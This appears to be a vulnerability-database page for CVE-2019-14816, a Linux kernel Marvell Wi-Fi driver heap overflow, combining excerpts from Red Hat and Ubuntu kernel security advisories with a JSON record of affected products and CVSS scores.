noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
ppc64: bpftool-3.10.0-1062.12.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm perf-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm
ppc64le: bpftool-3.10.0-1062.12.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm perf-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm
s390x: bpftool-3.10.0-1062.12.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm kernel-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-headers-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm perf-3.10.0-1062.12.1.el7.s390x.rpm perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm python-perf-3.10.0-1062.12.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm
ppc64le: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14816 https://access.redhat.com/security/cve/CVE-2019-14895 https://access.redhat.com/security/cve/CVE-2019-14898 https://access.redhat.com/security/cve/CVE-2019-14901 https://access.redhat.com/security/cve/CVE-2019-17133 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK kzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry plZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg 9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6 q6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7 DfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI EOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz hTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci N0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh wqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz hk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6 IwzrfQ6EsXE= =mofI -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Enhancement(s):
-
Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)
-
Please note that the RDS protocol is blacklisted in Ubuntu by default. ========================================================================= Ubuntu Security Notice USN-4163-2 October 23, 2019
linux-lts-xenial, linux-aws vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 ESM.
It was discovered that a race condition existed in the ARC EMAC ethernet driver for the Linux kernel, resulting in a use-after-free vulnerability. An attacker could use this to cause a denial of service (system crash). (CVE-2016-10906)
It was discovered that a race condition existed in the Serial Attached SCSI (SAS) implementation in the Linux kernel when handling certain error conditions. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18232)
It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2018-21008)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814, CVE-2019-14816)
Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)
Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel did not properly validate device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15117)
Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel improperly performed recursion while handling device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15118)
It was discovered that the Technisat DVB-S/S2 USB device driver in the Linux kernel contained a buffer overread. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2019-15505)
Brad Spengler discovered that a Spectre mitigation was improperly implemented in the ptrace susbsystem of the Linux kernel. A local attacker could possibly use this to expose sensitive information. (CVE-2019-15902)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: linux-image-4.4.0-1056-aws 4.4.0-1056.60 linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1 linux-image-aws 4.4.0.1056.57 linux-image-generic-lpae-lts-xenial 4.4.0.166.145 linux-image-generic-lts-xenial 4.4.0.166.145 linux-image-lowlatency-lts-xenial 4.4.0.166.145 linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145 linux-image-powerpc-smp-lts-xenial 4.4.0.166.145 linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145 linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145 linux-image-virtual-lts-xenial 4.4.0.166.145
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7) - noarch, x86_64
Bug Fix(es):
-
patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt] (BZ#1772522)
-
kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)
-
kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency requirement (BZ#1781157)
-
kernel-rt: hard lockup panic in during execution of CFS bandwidth period timer (BZ#1788057)
4
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "3.16.74"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.04"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.5"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "a320",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "service processor",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux compute node eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.4.194"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.4"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.9.194"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.75"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "c190",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.10"
},
{
"_id": null,
"model": "a220",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.0"
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "fas2720",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux for power big endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6_ppc64"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "messaging realtime grid",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "2.0"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "3.6"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.2"
},
{
"_id": null,
"model": "data availability services",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "enterprise linux tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "29"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.2.17"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a800",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "5.0"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.146"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "3.17"
},
{
"_id": null,
"model": "fas2750",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu,Red Hat",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
},
"cve": "CVE-2019-14816",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14816",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14816",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "secalert@redhat.com",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14816",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14816",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "secalert@redhat.com",
"id": "CVE-2019-14816",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201908-2176",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"description": {
"_id": null,
"data": "There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le\n\n3. \n\nBug Fix(es):\n\n* Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)\n\n* Kernel modules generated incorrectly when system is localized to\nnon-English language (BZ#1705285)\n\n* RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)\n\n4. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* Slow console output with ast (Aspeed) graphics driver (BZ#1780145)\n\n* core: backports from upstream (BZ#1794373)\n\n* System Crash on vport creation (NPIV on FCoE) (BZ#1796362)\n\n* [GSS] Can\u0027t access the mount point due to possible blocking of i/o on rbd\n(BZ#1796432)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security and bug fix update\nAdvisory ID: RHSA-2020:0374-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:0374\nIssue date: 2020-02-04\nCVE Names: CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 \n CVE-2019-14901 